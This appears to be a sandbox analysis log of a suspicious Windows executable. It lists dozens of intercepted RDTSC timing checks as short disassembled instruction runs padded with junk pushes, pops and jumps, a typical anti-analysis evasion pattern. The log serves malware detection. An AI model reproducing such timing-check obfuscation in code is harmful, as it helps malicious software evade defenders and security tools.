Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1686B9E second address: 1686BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16E0803 second address: 16E0812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F2274C03996h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16E0812 second address: 16E0816 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16E2449 second address: 16E244F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16E6B01 second address: 16E6B26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F22757AEC27h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007F22757AEC22h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A6867 second address: 16A686B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A6E2B second address: 16A6E36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F22757AEC16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A6F93 second address: 16A6F99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A6F99 second address: 16A6FB0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F22757AEC1Bh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A6FB0 second address: 16A6FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A7028 second address: 16A702E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A702E second address: 16A7033 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A72A0 second address: 16A72B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jnp 00007F22757AEC1Ch 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A73E9 second address: 16A73EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A739D second address: 16A73E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 nop 0x00000006 jng 00007F22757AEC1Ch 0x0000000c push 00000004h 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F22757AEC18h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D2D9Bh], ecx 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F22757AEC1Ah 0x00000036 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A7B2A second address: 16A7B2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A7B2E second address: 16A7B34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A7B34 second address: 16A7B91 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 je 00007F2274C03996h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 js 00007F2274C03996h 0x00000017 popad 0x00000018 push ecx 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c popad 0x0000001d nop 0x0000001e push 00000000h 0x00000020 push ebp 0x00000021 call 00007F2274C03998h 0x00000026 pop ebp 0x00000027 mov dword ptr [esp+04h], ebp 0x0000002b add dword ptr [esp+04h], 00000016h 0x00000033 inc ebp 0x00000034 push ebp 0x00000035 ret 0x00000036 pop ebp 0x00000037 ret 0x00000038 lea eax, dword ptr [ebp+1248C5C0h] 0x0000003e jnl 00007F2274C039A4h 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A7B91 second address: 16A7B95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A7B95 second address: 16A7B99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A7B99 second address: 16A7B9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A7B9F second address: 16A7BA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F2274C03996h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A7BA9 second address: 16A7BAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A7BAD second address: 16A7BEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jp 00007F2274C03999h 0x00000011 mov dx, bx 0x00000014 lea eax, dword ptr [ebp+1248C57Ch] 0x0000001a call 00007F2274C039A5h 0x0000001f mov dword ptr [ebp+122D3214h], ecx 0x00000025 pop ecx 0x00000026 nop 0x00000027 pushad 0x00000028 pushad 0x00000029 push ecx 0x0000002a pop ecx 0x0000002b push ecx 0x0000002c pop ecx 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A7BEF second address: 1686B94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnl 00007F22757AEC2Fh 0x0000000e nop 0x0000000f jmp 00007F22757AEC1Fh 0x00000014 call dword ptr [ebp+122D1BADh] 0x0000001a push eax 0x0000001b push edx 0x0000001c push ebx 0x0000001d jmp 00007F22757AEC1Dh 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 pop ebx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16E5CD8 second address: 16E5CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push edi 0x00000007 push ecx 0x00000008 push edx 0x00000009 pop edx 0x0000000a jc 00007F2274C03996h 0x00000010 pop ecx 0x00000011 jo 00007F2274C0399Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16E5FB9 second address: 16E5FBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16E5FBD second address: 16E5FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2274C0399Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2274C039A2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16E612D second address: 16E6136 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16E6136 second address: 16E6165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2274C039A5h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jg 00007F2274C0399Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16E6165 second address: 16E6180 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F22757AEC1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F22757AEC22h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16E6180 second address: 16E6186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16E62CA second address: 16E62EB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F22757AEC16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F22757AEC27h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16E62EB second address: 16E62F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16E62F1 second address: 16E62F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16E62F7 second address: 16E62FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16E62FB second address: 16E6307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16E66FC second address: 16E6711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jl 00007F2274C039ACh 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F2274C03996h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16E6711 second address: 16E6715 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16F2702 second address: 16F270B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16F270B second address: 16F272F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F22757AEC16h 0x00000008 jmp 00007F22757AEC24h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16F272F second address: 16F274B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2274C039A5h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16F274B second address: 16F276F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F22757AEC2Fh 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16F1DF0 second address: 16F1DF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16F6596 second address: 16F65AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F22757AEC1Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16F960F second address: 16F9628 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pushad 0x0000000d js 00007F2274C03996h 0x00000013 push eax 0x00000014 pop eax 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 166188D second address: 1661898 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1661898 second address: 16618A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16618A3 second address: 1661910 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F22757AEC24h 0x0000000d popad 0x0000000e jnp 00007F22757AEC6Ah 0x00000014 jng 00007F22757AEC30h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F22757AEC27h 0x00000021 jmp 00007F22757AEC21h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16F8F22 second address: 16F8F34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2274C0399Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16F9374 second address: 16F939B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F22757AEC27h 0x00000008 jmp 00007F22757AEC21h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007F22757AEC16h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16F939B second address: 16F93A5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2274C03996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 17024EB second address: 17024F5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F22757AEC16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 17024F5 second address: 17024FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 17024FF second address: 1702503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1700C8E second address: 1700C92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1700C92 second address: 1700CCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F22757AEC1Ch 0x0000000c jmp 00007F22757AEC26h 0x00000011 popad 0x00000012 push ecx 0x00000013 jne 00007F22757AEC1Ah 0x00000019 push eax 0x0000001a push edx 0x0000001b jc 00007F22757AEC16h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1701008 second address: 1701027 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2274C039A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a je 00007F2274C03996h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 170117F second address: 1701193 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F22757AEC1Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A756A second address: 16A7582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2274C0399Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1702263 second address: 1702269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1702269 second address: 170226D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1704C35 second address: 1704C3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1704C3B second address: 1704C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F2274C03998h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1704C4C second address: 1704C50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1704F83 second address: 1704F97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2274C0399Dh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 17052D1 second address: 17052EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F22757AEC27h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1709097 second address: 170909B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 170909B second address: 17090AB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jo 00007F22757AEC16h 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 17090AB second address: 17090B0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 17090B0 second address: 17090D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F22757AEC21h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jo 00007F22757AEC16h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1712DD1 second address: 1712DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1712DD5 second address: 1712DE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1712DE0 second address: 1712E10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2274C039A9h 0x00000009 jnl 00007F2274C03996h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jnl 00007F2274C03996h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1711988 second address: 171198C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1711F80 second address: 1711F86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1711F86 second address: 1711F8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1711F8A second address: 1711F9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2274C0399Bh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1711F9F second address: 1711FAC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1711FAC second address: 1711FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1711FB0 second address: 1711FD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F22757AEC24h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1712236 second address: 1712257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 jnl 00007F2274C03998h 0x0000000c pushad 0x0000000d jmp 00007F2274C0399Eh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 17127B2 second address: 17127E1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F22757AEC18h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F22757AEC25h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jo 00007F22757AEC2Ah 0x00000017 push eax 0x00000018 push edx 0x00000019 ja 00007F22757AEC16h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1712AC6 second address: 1712ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1712ACA second address: 1712AD9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F22757AEC16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1712AD9 second address: 1712ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1712ADF second address: 1712AE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
